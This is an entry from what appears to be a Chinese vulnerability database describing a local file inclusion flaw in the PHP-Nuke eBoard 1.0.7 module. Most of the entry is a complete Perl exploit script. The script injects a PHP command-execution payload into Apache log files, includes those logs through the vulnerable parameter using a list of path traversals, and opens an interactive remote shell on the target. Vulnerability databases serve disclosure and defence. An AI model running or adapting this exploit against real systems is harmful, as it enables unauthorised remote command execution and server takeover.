PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit

基本字段

漏洞编号：: SSV-6604

披露/发现时间：: 未知

提交时间：: 2007-04-10

漏洞等级：

漏洞类别：: 远程文件包含

影响组件：: PHP-Nuke

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.1KB

#!Perl # #PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] Local File Inclusion Exploit # #Vendor: http://www.complex-berlin.de/modules.php?name=Downloads&d_op=getit&lid=975 # # #Coded by bd0rk || SOH-Crew # #Greetz: str0ke, TheJT, MereX, mymaster # use IO::Socket; use LWP::Simple; #ripped @apache=( \"../../../../../var/log/httpd/access_log\", \"../../../../../var/log/httpd/error_log\", \"../apache/logs/error.log\", \"../apache/logs/access.log\", \"../../apache/logs/error.log\", \"../../apache/logs/access.log\", \"../../../apache/logs/error.log\", \"../../../apache/logs/access.log\", \"../../../../apache/logs/error.log\", \"../../../../apache/logs/access.log\", \"../../../../../apache/logs/error.log\", \"../../../../../apache/logs/access.log\", \"../logs/error.log\", \"../logs/access.log\", \"../../logs/error.log\", \"../../logs/access.log\", \"../../../logs/error.log\", \"../../../logs/access.log\", \"../../../../logs/error.log\", \"../../../../logs/access.log\", \"../../../../../logs/error.log\", \"../../../../../logs/access.log\", \"../../../../../etc/httpd/logs/access_log\", \"../../../../../etc/httpd/logs/access.log\", \"../../../../../etc/httpd/logs/error_log\", \"../../../../../etc/httpd/logs/error.log\", \"../../.. /../../var/www/logs/access_log\", \"../../../../../var/www/logs/access.log\", \"../../../../../usr/local/apache/logs/access_log\", \"../../../../../usr/local/apache/logs/access.log\", \"../../../../../var/log/apache/access_log\", \"../../../../../var/log/apache/access.log\", \"../../../../../var/log/access_log\", \"../../../../../var/www/logs/error_log\", \"../../../../../var/www/logs/error.log\", \"../../../../../usr/local/apache/logs/error_log\", \"../../../../../usr/local/apache/logs/error.log\", \"../../../../../var/log/apache/error_log\", \"../../../../../var/log/apache/error.log\", \"../../../../../var/log/access_log\", \"../../../../../var/log/error_log\" ); if (@ARGV < 3) { print \" PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] Local File Inclusion Exploit ############################################################### Usage: exploit.pl [victim] /modules/eBoard/ [apachepath] ############################################################### \"; exit(); } $host=$ARGV[0]; $path=$ARGV[1]; $apachepath=$ARGV[2]; print \"Code is injecting in logfiles... \"; $CODE=\"<?php ob_clean();system($HTTP_COOKIE_VARS[cmd]);die;?>\"; $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connection failed. \"; print $socket \"GET \".$path.$CODE.\" HTTP/1.1 \"; print $socket \"user-Agent: \".$CODE.\" \"; print $socket \"Host: \".$host.\" \"; print $socket \"Connection: close \"; close($socket); print \"Write END to exit! \"; print \"If not working try another apache path \"; print \"[shell] \";$cmd = <STDIN>; while($cmd !~ \"END\") { $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connection failed. \"; #now include parameter print $socket \"GET \".$path.\"member.php?GLOBALS[name]=\".$apache[$apachepath].\"%00&cmd=$cmd HTTP/1.1 \"; print $socket \"Host: \".$host.\" \"; print $socket \"Accept: */* \"; print $socket \"Connection: close \"; while ($raspuns = <$socket>) { print $raspuns; } print \"[shell] \"; $cmd = <STDIN>; }  

共 1 兑换

参考链接

解决方案

临时解决方案

官方解决方案

防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定